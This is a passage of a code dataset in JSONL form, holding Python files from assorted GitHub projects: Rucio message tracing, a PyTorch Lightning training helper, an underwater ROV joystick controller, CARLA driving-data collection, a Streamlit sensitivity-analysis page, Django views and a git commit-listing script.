False\n else:\n result = True\n return result\n\n\nlogging.getLogger(\"stomp\").setLevel(logging.CRITICAL)\n\nfor broker in BROKERS_ALIAS:\n try:\n addrinfos = socket.getaddrinfo(broker, 0, socket.AF_INET, 0, socket.IPPROTO_TCP)\n BROKERS_RESOLVED = [ai[4][0] for ai in addrinfos]\n except:\n pass\n\nCONNS = []\n\nfor broker in BROKERS_RESOLVED:\n CONNS.append(stomp.Connection(host_and_ports=[(broker, PORT)], vhost=VHOST, reconnect_attempts_max=3))\n\n\ndef date_handler(obj):\n \"\"\" format dates to ISO format \"\"\"\n return obj.isoformat() if hasattr(obj, 'isoformat') else obj\n\n\n@METRICS.count_it\ndef trace(payload):\n \"\"\"\n Write a trace to the buffer log file and send it to active mq.\n\n :param payload: Python dictionary with trace report.\n \"\"\"\n\n report = json.dumps(payload, default=date_handler)\n ROTATING_LOGGER.debug(report)\n t_conns = CONNS[:]\n\n try:\n validate_schema(report)\n except InvalidObject as error:\n ROTATING_LOGGER.warning(\"Problem validating schema: %s\" % error)\n LOGGER.warning(\"Problem validating schema: %s\" % error)\n\n try:\n for i in range(len(t_conns)):\n try:\n conn = random.sample(t_conns, 1)[0]\n if not conn.is_connected():\n LOGGER.info('reconnect to ' + conn.transport._Transport__host_and_ports[0][0])\n conn.connect(USERNAME, PASSWORD)\n except stomp.exception.NotConnectedException:\n LOGGER.warning('Could not connect to broker %s, try another one' %\n conn.transport._Transport__host_and_ports[0][0])\n t_conns.remove(conn)\n continue\n except stomp.exception.ConnectFailedException:\n LOGGER.warning('Could not connect to broker %s, try another one' %\n conn.transport._Transport__host_and_ports[0][0])\n t_conns.remove(conn)\n continue\n\n if conn.is_connected:\n conn.send(body=report, destination=TOPIC, headers={'persistent': 'true', 'appversion': 'rucio'})\n else:\n LOGGER.error(\"Unable to connect to broker. 
Could not send trace: %s\" % report)\n except Exception as error:\n LOGGER.error(error)\n\n\ndef validate_schema(obj):\n \"\"\"\n Validate object against json schema\n\n :param obj: The object to validate.\n\n :raises: InvalidObject\n \"\"\"\n obj = json.loads(obj)\n\n try:\n if obj and 'eventType' in obj:\n event_type = SCHEMAS.get(obj['eventType'].lower())\n if not event_type:\n validation_error = ValidationError(message=f\"Trace schema for eventType {obj['eventType']} is not currently supported.\")\n validation_error.cause = \"SCHEMA_NOT_FOUND\"\n raise validation_error\n validate(obj, SCHEMAS.get(obj['eventType'].lower()), format_checker=FORMAT_CHECKER)\n except ValidationError as error:\n if error.cause == \"SCHEMA_NOT_FOUND\":\n LOGGER.error(error)\n else:\n raise InvalidObject(error)\n","repo_name":"rucio/rucio","sub_path":"lib/rucio/core/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":12460,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"96"}
+{"seq_id":"3588457221","text":"import numpy as np\nimport matplotlib.pyplot as plot\n\n'''\nUsage:\nimport myplot\ngildong = myplot.MyPlot()\ngildong.set_attribute('o-')\ngildong.show()\n\nimport numpy as np\nimport myplot\ngildong = myplot.MyPlot()\ngildong.set_attribute('o-')\ngildong.show(np.arange(1, 5, 0.1))\n\n'''\n\n# Displays a list as a graph.\nclass MyPlot:\n attr = 'o-' # line style attribute\n x_label = ''\n y_label = ''\n\n def set_attribute(self, a):\n self.attr = a\n\n def set_labels(self, xl, yl):\n self.x_label = xl\n self.y_label = yl\n\n # arange returns an ndarray: Array of evenly spaced values.\n def show_arange(self, arr=np.arange(1, 10, 0.1)):\n plot.plot(arr, self.attr)\n plot.xlabel(self.x_label)\n plot.ylabel(self.y_label)\n plot.show()\n\n def show_list(self, list):\n plot.plot(list, self.attr)\n plot.xlabel(self.x_label)\n plot.ylabel(self.y_label)\n plot.show()\n\n","repo_name":"JNU-Room/ML","sub_path":"ML_KJY/CNN_JJJY/CNN_JY/pylib/myplot.py","file_name":"myplot.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"}
+{"seq_id":"22004923559","text":"import pytorch_lightning as pl \nfrom pytorch_lightning import LightningModule, Trainer\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\n\ndef train_model(model, clipping, num_epochs, data_loader_train, data_loader_val, data_loader_test):\n\n early_stop_callback = EarlyStopping(\n monitor='valid_accuracy',\n min_delta=0.00,\n patience=10,\n verbose=False,\n mode='max'\n )\n trainer = Trainer( max_epochs=num_epochs, gradient_clip_val= clipping, progress_bar_refresh_rate = 40, gpus=0, callbacks=[early_stop_callback])\n trainer.fit(model, data_loader_train, data_loader_val)\n final_results = trainer.logged_metrics\n final_results[\"test\"] = trainer.test(model, data_loader_test)[0]\n final_results[\"num_epochs\"] = trainer.current_epoch\n final_results[\"num_parameters\"] = model.num_paramaters()\n return final_results","repo_name":"nickbent/multi-timeseries-classification","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
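A hedged usage sketch for the train_model helper above (the callback line is runnable with pytorch_lightning installed; MyModel and the three loaders are placeholders you would supply, and the model must log 'valid_accuracy' during validation):

from pytorch_lightning.callbacks.early_stopping import EarlyStopping

# the same early-stopping policy the helper builds internally
cb = EarlyStopping(monitor='valid_accuracy', patience=10, mode='max')

# results = train_model(MyModel(), clipping=0.5, num_epochs=100,
#                       data_loader_train=train_loader,
#                       data_loader_val=val_loader,
#                       data_loader_test=test_loader)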
pygame.font.Font(None, 20)\n\n    def print(self, screen, textString):\n        textBitmap = self.font.render(textString, True, BLACK)\n        screen.blit(textBitmap, [self.x, self.y])\n        self.y += self.line_height\n\n    def location_print(self, screen, textString,x=size[0]-200,y=0):\n        textBitmap = self.font.render(textString, True, BLACK)\n        screen.blit(textBitmap, [x, y])\n\n\n    def title(self,screen):\n\n        self.location_print(screen, \"----Sağa-Sola Dönüş---\", y=0)\n\n        self.location_print(screen, \"---Araç İleri-Geri Durumu---\", y=30)\n\n        \"\"\"here we display the button information for the vehicle's dive and ascent on the screen\"\"\"\n\n        self.location_print(screen,\n                            \"                  ----Derinlik Durum----\",\n                            y=60)\n\n        \"\"\"print the Gripper label to the screen\"\"\"\n        self.location_print(screen,\n                            \"                  ----Gripper Arm Durumu----\",\n                            y=90)\n\n        \"\"\"print the light status information to the screen\"\"\"\n        self.location_print(screen,\n                            \"                  ----Işık Durum Bilgisi----\",\n                            y=120)\n\n    \"\"\"a function for reading the vehicle's depth state in real time\"\"\"\n    def depth_button(self, screen,button_index,button_value):\n\n        \"\"\"here we define a reusable helper that prints the 'vehicle holding steady' message\"\"\"\n        def vehicle_constant():\n            self.print(screen, \"Araç Sabit Durmakta.\")\n\n\n\n        \"\"\"if one of the dive/surface buttons is pressed (button value becomes 1), print a message to the screen\"\"\"\n        if button_index == 4 or button_index==6:\n            x=self.x\n            if button_value==1:\n\n                #self.print(screen, \"Araç Yüzeye Çıkmakta.\" if button_index== 4 else \"Araç Derine Doğru Dalmakta.\")\n\n                self.location_print(screen, (\"Araç Yüzeye Çıkmakta.\" if button_value==1 else \"Araç Sabit Durmakta.\")\n                                    if button_index== 4 else\n                                    (\"Araç Derine Doğru Dalmakta.\"if button_value==1 else \"Araç Sabit Durmakta.\"),y=75)\n\n            # elif button_value==0:\n            #     self.location_print(screen, \"\" if button_value == 1 else \"Araç Sabit Durmakta.\", y=15)\n\n\n\n\n    \"\"\"a function made for controlling the gripper\"\"\"\n    def gripper_arm(self, screen,button_index,button_value):\n\n\n        \"\"\"here we display the button information for opening and closing the vehicle arm on the screen\"\"\"\n\n        if button_index == 5 or button_index==7:\n            x=self.x\n            if button_value==1:\n\n                #self.print(screen, \"Araç Yüzeye Çıkmakta.\" if button_index== 4 else \"Araç Derine Doğru Dalmakta.\")\n\n                self.location_print(screen, (\"Kol açılıyor.\" if button_value==1 else \"Araç Kolu Sabit Durmakta.\")\n                                    if button_index== 5 else\n                                    (\"Kol Kapanıyor.\"if button_value==1 else \"Araç Kolu Sabit Durmakta.\"),y=105)\n\n\n\n        # if button_index == 5 or button_index==7:\n        #     if button_value==1:\n        #         self.print(screen, \"Kol açılıyor.\" if button_index== 7 else \"Kol Kapanıyor.\")\n        #     else:\n        #         vehicle_constant()\n\n    def reset(self):\n        self.x = 1150\n        self.y = 10\n        self.line_height = 40\n\n    def indent(self):\n        self.x += 10\n\n    def unindent(self):\n        self.x -= 10\n\n\ncamera = cv2.VideoCapture(0)\n    # read frames from the camera\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\n\n\n# This is a simple class that helps us print to the screen.\n# It has nothing to do with the joysticks, it is just\n# information.\npygame.init()\n\n# Set the width and height of the screen [width, height]\nscreen = pygame.display.set_mode(size)\n\npygame.display.set_caption(\"Joystick ile PC'den Kontrol\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n\n# initialize the joysticks\npygame.joystick.init()\n\n# Initialize and start the camera\n# pygame.camera.Camera.start()\n\n\ntextPrint = TextPrint()\n\n# -------- Main Program Loop -----------\n# cam=cv2.VideoCapture(0)\ntry:\n\n    while not done:\n\n        # EVENT PROCESSING STEP\n        for event in pygame.event.get(): # The user did something\n            if event.type == pygame.QUIT: # If the user clicked close\n                done = True # Flag that we are done, so we exit this loop\n\n        # DRAWING STEP\n        # First, clear the screen to white. Don't put other drawing commands\n        # above this, or they will be erased by this one.\n\n        screen.fill(WHITE)\n\n        # ret, frame = camera.read()\n\n        ws = create_connection(\"ws://127.0.0.1:5001\")\n        ws.send(\"Hello, World\")\n        result = ws.recv()\n        ws.close()\n        im_bytes = base64.b64decode(result.decode(\"utf-8\"))\n        im_arr = np.frombuffer(im_bytes, dtype=np.uint8)  # im_arr is one-dim Numpy array\n        img = cv2.imdecode(im_arr, flags=cv2.IMREAD_COLOR)\n        # cv2.imshow(\"Resim\", img)\n        frame = img.copy()\n\n        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n        frame = np.array(frame)\n        # scale up/down by a percentage\n        width_percent = 100\n        height_percent = 80\n        width = int(frame.shape[1] * width_percent / 100)\n        height = int(frame.shape[1] * height_percent / 100)\n        dim = (width, height)\n\n        frame = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n        frame = np.rot90(frame)\n        frame = pygame.surfarray.make_surface(frame)\n        screen.blit(frame, (100, 100))\n\n        # pygame.display.update()\n\n        # Get the number of joysticks\n        joystick_count = pygame.joystick.get_count()\n\n        # textPrint.print(screen, \"joysticks kolu sayısı : {}\".format(joystick_count))\n        # textPrint.indent()\n        # pilotInput = [0 for]\n        # For each joystick:\n        for i in range(joystick_count):\n\n            \"\"\"print the title information to the screen\"\"\"\n            textPrint.title(screen)\n\n            joystick = pygame.joystick.Joystick(i)\n            joystick.init()\n\n            # textPrint.print(screen, \"Joystick {}\".format(i))\n            # textPrint.indent()\n\n            # Get the controller/joystick name from the operating system\n            name = joystick.get_name()\n\n            # Axes usually run in pairs, up/down for one and left/right for the other.\n            axes = joystick.get_numaxes()\n\n            for i in range(axes):\n                axis = joystick.get_axis(i)\n\n                if i == 0:\n\n                    if axis == -1.0:\n                        # textPrint.print(screen, \"Sola Hareket Etmekte.\")\n                        textPrint.location_print(screen, \"Sola Hareket Etmekte.\", y=15)\n\n                    elif axis == 0.999969482421875:\n                        # textPrint.print(screen, \"Sağa Hareket Etmekte.\")\n                        textPrint.location_print(screen, \"Sağa Hareket Etmekte.\", y=15)\n                    else:\n                        # textPrint.print(screen, \"Sağa - Sola Hareket etmiyor.\")\n                        textPrint.location_print(screen, \"Sağa - Sola Hareket etmiyor.\", y=15)\n                elif i == 1:\n\n                    if axis == -1.0:\n                        # textPrint.print(screen, \"Araç İleri Doğru Gitmekte.\")\n                        textPrint.location_print(screen, \"Araç İleri Doğru Gitmekte.\", y=45)\n\n                    elif axis == 0.999969482421875:\n                        # textPrint.print(screen, \"Araç Geri Doğru Gitmekte.\")\n                        textPrint.location_print(screen, \"Araç Geri Doğru Gitmekte.\", y=45)\n\n                    else:\n                        # textPrint.print(screen, \"Araç Sabit Durmakta.\")\n                        textPrint.location_print(screen, \"Araç Sabit Durmakta.\", y=45)\n\n            buttons = joystick.get_numbuttons()\n\n            for i in range(buttons):\n                button = joystick.get_button(i)\n\n                if i == 0:\n                    textPrint.location_print(screen, \"Araç Önü Aydınlatılıyor.\" if button == 1 else \"\", y=135)\n                elif i == 1:\n                    pass\n                elif i == 2:\n                    pass\n                elif i == 3:\n                    pass\n                elif i == 4:\n                    \"\"\"depth: surfacing\"\"\"\n                    textPrint.depth_button(screen, i, button)\n\n                elif i == 6:\n                    \"\"\"depth: diving\"\"\"\n                    textPrint.depth_button(screen, i, button)\n                elif i == 5:\n                    \"\"\"gripper\"\"\"\n                    # textPrint.gripper_arm(screen,i,button)\n                    textPrint.location_print(screen, \"Araç Kol Ağzı Açılıyor.\" if button == 1 else \"\", y=105)\n\n                elif i == 7:\n                    \"\"\"gripper\"\"\"\n                    # textPrint.gripper_arm(screen, i, button)\n                    textPrint.location_print(screen, \"Araç Kol Ağzı Kapanıyor.\" if button == 1 else \"\", y=105)\n\n            textPrint.reset()\n\n            # Hat switch. All or nothing for direction, not like a joystick.\n            # The value comes back in an array.\n            hats = joystick.get_numhats()\n\n            for i in range(hats):\n                hat = joystick.get_hat(i)\n\n                # async with websockets.connect(\"ws://127.0.0.1:5553\") as socket:\n\n                    # await socket.send(str(message_list))  # send the message\n\n        # ALL CODE TO DRAW SHOULD GO ABOVE THIS COMMENT\n\n        # Go ahead and update the screen with what we've drawn.\n        pygame.display.flip()\n\n        # Limit the frame rate to 24 frames per second\n        clock.tick(24)\nexcept (KeyboardInterrupt, SystemExit):\n    pygame.quit()\n    cv2.destroyAllWindows()\n# Close the window and quit.\n# If you forget this line, the program will 'hang'\n# on exit when running from IDLE.\npygame.quit()\n\n\n\n","repo_name":"harunkurtme/UnderWater-Rov-KOU-GALLIPOLI","sub_path":"Rover/Controller-PC/motors_controller.py","file_name":"motors_controller.py","file_ext":"py","file_size_in_byte":10500,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"}
{"seq_id":"35976818491","text":"#Dependencies\r\nimport glob\r\nimport os\r\nimport sys\r\nimport time\r\nimport numpy as np\r\nimport carla\r\nfrom IPython.display import display, clear_output\r\nimport logging\r\nimport random\r\nfrom datetime import datetime\r\nimport cv2\r\n\r\nimport argparse\r\nimport keyboard\r\nimport threading\r\n\r\n\r\n\r\n\r\n\r\n#autopilot parser\r\ndef parse_arguments():\r\n    parser = argparse.ArgumentParser(description='Autopilot Flag Parser')\r\n    parser.add_argument('--autopilot', action='store_true', help='Enable autopilot')\r\n    parser.add_argument('--folder', type=str, help='Path to the file')\r\n    parser.add_argument('--frames', type=int, help='nbr of frames to save')\r\n    return parser.parse_args()\r\n\r\n# Function to control the vehicle with keyboard inputs\r\ndef control_vehicle(vehicle):\r\n    # Constants for controlling the vehicle\r\n    STEER_INCREMENT = 0.05\r\n    THROTTLE_INCREMENT = 0.05\r\n    BRAKE_INCREMENT = 0.05\r\n\r\n    # Initialize control values\r\n    steer = 0.0\r\n    throttle = 0.0\r\n    brake = 0.0\r\n    \r\n    # Keyboard input handlers\r\n    def on_key_release(key):\r\n        nonlocal steer, throttle, brake\r\n\r\n        if key.name == \"left\":\r\n            steer=0\r\n        elif key.name == \"right\":\r\n            steer=0\r\n        if key.name == \"up\":\r\n            throttle =0\r\n        if key.name == \"down\":\r\n            brake=0\r\n\r\n        # Update vehicle controls\r\n        control = carla.VehicleControl()\r\n        control.steer = steer\r\n        control.throttle = throttle\r\n        control.brake = brake\r\n        vehicle.apply_control(control)\r\n\r\n    def on_key_press(key):\r\n        nonlocal steer, throttle, brake\r\n\r\n        if key.name == \"left\":\r\n            steer -= STEER_INCREMENT\r\n        elif key.name == \"right\":\r\n            steer += STEER_INCREMENT\r\n        if key.name == \"up\":\r\n            throttle += THROTTLE_INCREMENT\r\n        if key.name == \"down\":\r\n            brake += BRAKE_INCREMENT\r\n            throttle -=THROTTLE_INCREMENT\r\n\r\n\r\n        # Update vehicle controls\r\n        control = carla.VehicleControl()\r\n        
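# Note: per the CARLA Python API, VehicleControl expects steer in [-1, 1] and throttle/brake\r\n        # in [0, 1]; since the increments above accumulate across key presses, clamping here would\r\n        # keep the values in range, e.g. steer = max(-1.0, min(1.0, steer)) (a sketch; the\r\n        # simulator may also clamp internally).\r\n        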
control.steer = steer\r\n control.throttle = throttle\r\n control.brake = brake\r\n vehicle.apply_control(control)\r\n\r\n # Register keyboard event handlers\r\n keyboard.on_release_key(\"left\", on_key_release)\r\n keyboard.on_release_key(\"right\", on_key_release)\r\n keyboard.on_release_key(\"up\", on_key_release)\r\n keyboard.on_release_key(\"down\", on_key_release)\r\n keyboard.on_press_key(\"left\", on_key_press)\r\n keyboard.on_press_key(\"right\", on_key_press)\r\n keyboard.on_press_key(\"up\", on_key_press)\r\n keyboard.on_press_key(\"down\", on_key_press)\r\n\r\n\r\n\r\n\r\n# Function to update the spectator view\r\ndef update_spectator_view():\r\n while True:\r\n # Get the location and rotation of the vehicle\r\n vehicle_location = vehicle.get_location()\r\n vehicle_rotation = vehicle.get_transform().rotation\r\n\r\n # Calculate the spectator view transform\r\n spectator_location = carla.Location(vehicle_location.x, vehicle_location.y, vehicle_location.z + 2.0) # Adjust the height offset if needed\r\n spectator_rotation = carla.Rotation(vehicle_rotation.pitch - 15.0, vehicle_rotation.yaw, vehicle_rotation.roll) # Adjust the pitch offset if needed\r\n spectator_transform = carla.Transform(spectator_location, spectator_rotation)\r\n\r\n # Set the spectator view transform\r\n spectator.set_transform(spectator_transform)\r\n\r\n time.sleep(0.005)\r\n\r\n\r\n\r\n\r\n# Autopilot flag parsing\r\nargs = parse_arguments()\r\n\r\n\r\n\r\n\r\nvehicle = None\r\ncam = None\r\n\r\n#enable logging\r\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\r\n\r\n# Creating a client\r\nclient = carla.Client('localhost', 2000)\r\nclient.set_timeout(15.0)\r\nclient.load_world('Town10HD')\r\nworld = client.get_world()\r\n\r\n\r\n#Create Folder to store data\r\ntoday = datetime.now()\r\nif today.hour < 10:\r\n h = \"0\"+ str(today.hour)\r\nelse:\r\n h = str(today.hour)\r\nif today.minute < 10:\r\n m = \"0\"+str(today.minute)\r\nelse:\r\n m = str(today.minute)\r\n\r\n\r\nif args.folder :\r\n file_path=args.folder\r\n\r\nelse :\r\n print(\"please add the --folder YOUR/Folder/ argument to your prompt command\")\r\n \r\ndirectory = file_path +\"\\\\TestData\"+ today.strftime('%Y%m%d_')+ h + m + \"_npy\"\r\n\r\nprint(directory)\r\n\r\ntry:\r\n os.makedirs(directory)\r\nexcept:\r\n print(\"Directory already exists\")\r\ntry:\r\n inputs_file = open(directory + \"/inputs.npy\",\"ba+\") \r\n outputs_file = open(directory + \"/outputs.npy\",\"ba+\") \r\nexcept:\r\n print(\"Files could not be opened\")\r\n \r\n#Spawn vehicle\r\n#Get the blueprint concerning a tesla model 3 car\r\nbp = world.get_blueprint_library().find('vehicle.tesla.model3')\r\n#we attribute the role name amrn to our blueprint\r\nbp.set_attribute('role_name','amrn')\r\n#get a random color\r\ncolor = random.choice(bp.get_attribute('color').recommended_values)\r\n#put the selected color on our blueprint\r\nbp.set_attribute('color',color)\r\n\r\n#get all spawn points\r\nspawn_points = world.get_map().get_spawn_points()\r\nnumber_of_spawn_points = len(spawn_points)\r\n\r\n#select a random spawn point\r\nif 0 < number_of_spawn_points:\r\n random.shuffle(spawn_points)\r\n transform = spawn_points[0]\r\n #spawn our vehicle !\r\n vehicle = world.spawn_actor(bp,transform)\r\n print('\\nVehicle spawned')\r\nelse: \r\n #no spawn points \r\n logging.warning('Could not found any spawn points')\r\n \r\n#Adding a RGB camera sensor\r\nWIDTH = 200\r\nHEIGHT = 88\r\ncam_bp = None\r\n#Get blueprint of a camera\r\ncam_bp = 
world.get_blueprint_library().find('sensor.camera.rgb')\r\n#Set attributes \r\ncam_bp.set_attribute(\"image_size_x\",str(WIDTH))\r\ncam_bp.set_attribute(\"image_size_y\",str(HEIGHT))\r\ncam_bp.set_attribute(\"fov\",str(105))\r\n#Location to attach the camera on the car\r\ncam_location = carla.Location(2,0,1)\r\ncam_rotation = carla.Rotation(0,0,0)\r\ncam_transform = carla.Transform(cam_location,cam_rotation)\r\n#Spawn the camera and attach it to our vehicle \r\ncam = world.spawn_actor(cam_bp,cam_transform,attach_to=vehicle, attachment_type=carla.AttachmentType.Rigid)\r\n\r\n#Gets the spectator view to where the vehicle is spawned\r\nspectator = world.get_spectator()\r\nspawn_points[0].location.z = spawn_points[0].location.z+1 #start_point was used to spawn the car but we move 1m up to avoid being on the floor\r\nspectator.set_transform(spawn_points[0])\r\n\r\n#Function to convert image to a numpy array\r\ndef process_image(image):\r\n #Get raw image in 8bit format\r\n raw_image = np.frombuffer(image.raw_data, dtype=np.dtype(\"uint8\"))\r\n #Reshape image to RGBA\r\n raw_image = np.reshape(raw_image, (image.height, image.width, 4))\r\n\r\n\r\n #Taking only RGB\r\n processed_image = raw_image[:, :, :3]/255\r\n\r\n\r\n return processed_image\r\n\r\n#Save required data\r\ndef save_image(carla_image):\r\n image = process_image(carla_image)\r\n\r\n control = vehicle.get_control()\r\n data = [control.steer, control.throttle, control.brake]\r\n np.save(inputs_file, image)\r\n np.save(outputs_file, data)\r\n \r\n\r\n# Enable autopilot or keyboard control based on the flag\r\nif args.autopilot:\r\n vehicle.set_autopilot(True)\r\nelse:\r\n control_vehicle(vehicle)\r\n\r\n\r\n#Attach event listeners\r\ncam.listen(save_image)\r\n\r\n\r\n\r\n\r\n# Start the spectator view update loop\r\nupdate_spectator_view_thread = threading.Thread(target=update_spectator_view)\r\nupdate_spectator_view_thread.start()\r\n\r\n\r\n# Main loop\r\ntry:\r\n i = 0\r\n #How much frames do we want to save\r\n while i < args.frames:\r\n world_snapshot = world.wait_for_tick()\r\n clear_output(wait=True)\r\n display(f\"{str(i)} frames saved\")\r\n i += 1\r\n\r\n\r\nexcept:\r\n print('\\nSimulation error.')\r\n\r\n#Destroy everything \r\nif vehicle is not None:\r\n if cam is not None:\r\n cam.stop()\r\n cam.destroy()\r\n vehicle.destroy()\r\n\r\n#Close everything \r\ninputs_file.close()\r\noutputs_file.close()\r\nprint(\"Data retrieval finished\")\r\nprint(directory)\r\n\r\n\r\n\r\n\r\n","repo_name":"KadAMRN/carla-imitation-learning","sub_path":"data_collection_no_map_data.py","file_name":"data_collection_no_map_data.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32727653614","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nimport plotly.graph_objects as go\r\nimport plotly.express as px\r\n\r\nif st.session_state.lm:\r\n model = st.session_state.lm\r\n df = st.session_state.df\r\n X,y = st.session_state.lm_params\r\n coeffs = model.coef_ \r\n coeff_df = pd.DataFrame(\r\n data=coeffs,\r\n columns=[\"coefficients\"],\r\n index=df.columns\r\n )\r\n baseline_predictions = model.predict(X)\r\n sensitivity_df = pd.DataFrame(columns=['Feature', 'Baseline', 'Perturbed', 'Difference'])\r\n sensitivity_l = []\r\n for feature in X.columns:\r\n perturbed_X = X.copy()\r\n perturbed_X[feature] = np.random.normal(perturbed_X[feature].mean()*2,\r\n perturbed_X[feature].std()*2, \r\n len(perturbed_X))\r\n\r\n 
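# Note: this perturbation draws a fresh random sample centered at twice the feature's mean\r\n        # (with doubled std), i.e. it replaces the column wholesale rather than nudging the observed\r\n        # values, so the 'Difference' computed below measures the effect of that replacement rather\r\n        # than a local sensitivity.\r\n        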
perturbed_predictions = model.predict(perturbed_X)\r\n        difference = perturbed_predictions - baseline_predictions\r\n        sensitivity_l.append({\r\n            'Feature': feature,\r\n            'Baseline': np.mean(baseline_predictions),\r\n            'Perturbed': np.mean(perturbed_predictions),\r\n            'Difference': np.mean(difference)\r\n        })\r\n        \r\n    sensitivity_df = pd.concat([sensitivity_df, pd.DataFrame(sensitivity_l)], ignore_index=True)\r\n    st.dataframe(sensitivity_df)\r\n    st.text('The magnitude of each bar below indicates the impact that specific feature')\r\n    st.text('will have on the house price, i.e. a larger bar indicates a larger impact on the price')\r\n    fig = go.Figure()\r\n\r\n    fig.add_trace(go.Bar(\r\n        name='Positive',\r\n        x=sensitivity_df['Difference'],\r\n        y=sensitivity_df['Feature'],\r\n        orientation='h',\r\n        marker_color='azure'\r\n    ))\r\n\r\n    fig.update_layout(\r\n        title='Sensitivity Analysis',\r\n        xaxis_title='Change in Predicted Output',\r\n        yaxis_title='Feature',\r\n        barmode='relative',\r\n        bargap=0.2,\r\n        bargroupgap=0.1,\r\n        showlegend=False,\r\n    )\r\n\r\n    st.plotly_chart(fig)\r\n    df_corr = X.copy()\r\n    df_corr[\"SalePrice\"] = y\r\n    _ = df_corr.columns.tolist()\r\n    cols = _[-1:] + _[:-1]\r\n    df_corr=df_corr[cols]\r\n    st.plotly_chart(px.imshow(df_corr.corr(),\r\n                              width = 700,\r\n                              height = 700,\r\n                              color_continuous_scale='Viridis'\r\n                              )\r\n                    )\r\n    \r\n","repo_name":"stefziv/436-Project","sub_path":"pages/2_Model_&_Sensitivity_Analysis.py","file_name":"2_Model_&_Sensitivity_Analysis.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
{"seq_id":"28093867583","text":"from django.conf.urls import url\nfrom . import views \nurlpatterns = [\n    url(r'^$', views.index),\n    url(r'^process$', views.process),\n    url(r'^success$', views.success),\n    url(r'^login$', views.login),\n    url(r'^reset$', views.reset),\n    url(r'^addtravel$', views.addtravel),\n    url(r'^processtrip$', views.processtrip),\n    url(r'^success/destination/(?P<id>[0-9]+)$', views.almostdone),\n    url(r'^success/join', views.join),\n\n\n    \n\n] ","repo_name":"AlinaSadykova/belt_exam","sub_path":"apps/exam_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
{"seq_id":"11768766094","text":"from django.shortcuts import render\nfrom .models import description\n\n\n\ndef page(request):\n\n    des1=description()\n    des1.id=1\n    des1.name=\"Ab\"\n    des1.image='c++.jpg'\n\n    des2=description()\n    des2.id=2\n    des2.name=\"wp\"\n    des2.image='c.png'\n    des3=description()\n\n    des3.id=3\n    des3.name=\"pv\"\n    des3.image='css.png'\n    dest=[des1,des2,des3]\n\n    return render(request,'home.html',{'dest':dest})\n    ","repo_name":"vidhyaen/django","sub_path":"dynamic/page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
{"seq_id":"73280386557","text":"import subprocess\nimport optparse\nimport sys\nimport os\n\n# Start by checking what the user wants to monitor!\np = optparse.OptionParser()\np.add_option('--path', '-p', action='store', type=\"string\", default=\"\", help=\"Repository path\")\np.add_option('--since', '-s', action='store', type=\"string\", default=\"\", help=\"Starting point of interest\")\np.add_option('--until', '-u', action='store', type=\"string\", default=\"\", help=\"Until which date\")\np.add_option('--range', '-r', action='store', 
type=\"string\", default=\"\", help=\"Range of commits\")\np.add_option('--count', '-c', action='store', type=\"int\", default=-1, help=\"Select n commits in this commit range\")\np.add_option('--interval', '-i', action='store', type=\"string\", default=\"\", help=\"Interval between commits\")\noptions, arguments = p.parse_args()\n\nif len(options.path) == 0:\n    print (\"You need to specify a path to the git repo using -p.\")\n    exit(1)\n\n# Move to the repo's directory\nos.chdir(options.path)\n\n# Generate the call to git!\ngitCommandLine = [\"/usr/bin/git\", \"log\", \"--oneline\", \"--date=short\"]\n\nif len(options.range) > 0:\n    gitCommandLine.extend([options.range])\nif len(options.until):\n    gitCommandLine.extend([\"--until\", options.until])\n\nresult = []\nif options.count >= 0:\n    if len(options.since) > 0:\n        gitCommandLine.extend([\"--since\", options.since])\n    commitList = subprocess.check_output(gitCommandLine).decode().split(sep='\\n')\n    step = len(commitList) / options.count\n    for i in range(0, options.count):\n        result.append(commitList[int(i * step)].split()[0])\nelif options.interval:\n    gitCommandLine.extend([\"--reverse\"])\n    date = options.since\n    sys.stderr.write('Gathering commits: ')\n    while True:\n        gitCommandLineRound = list(gitCommandLine)\n        gitCommandLineRound.extend([\"--since\", date])\n        commitList = subprocess.check_output(gitCommandLineRound)\n        if len(commitList) == 0:\n            break\n        commitList = commitList.decode().split(sep='\\n')\n        result.append(commitList[0].split()[0])\n\n        sys.stderr.write('.'); sys.stderr.flush()\n        date = subprocess.check_output([\"date\", \"+%Y-%m-%d\", \"-d\", date + \" +\" + options.interval]).decode().split(sep='\\n')[0]\n\nsys.stderr.write('\\n'); sys.stderr.flush()\nprint (\" \".join(result))\n","repo_name":"tiagovignatti/ezbench","sub_path":"utils/get_commit_list.py","file_name":"get_commit_list.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"}
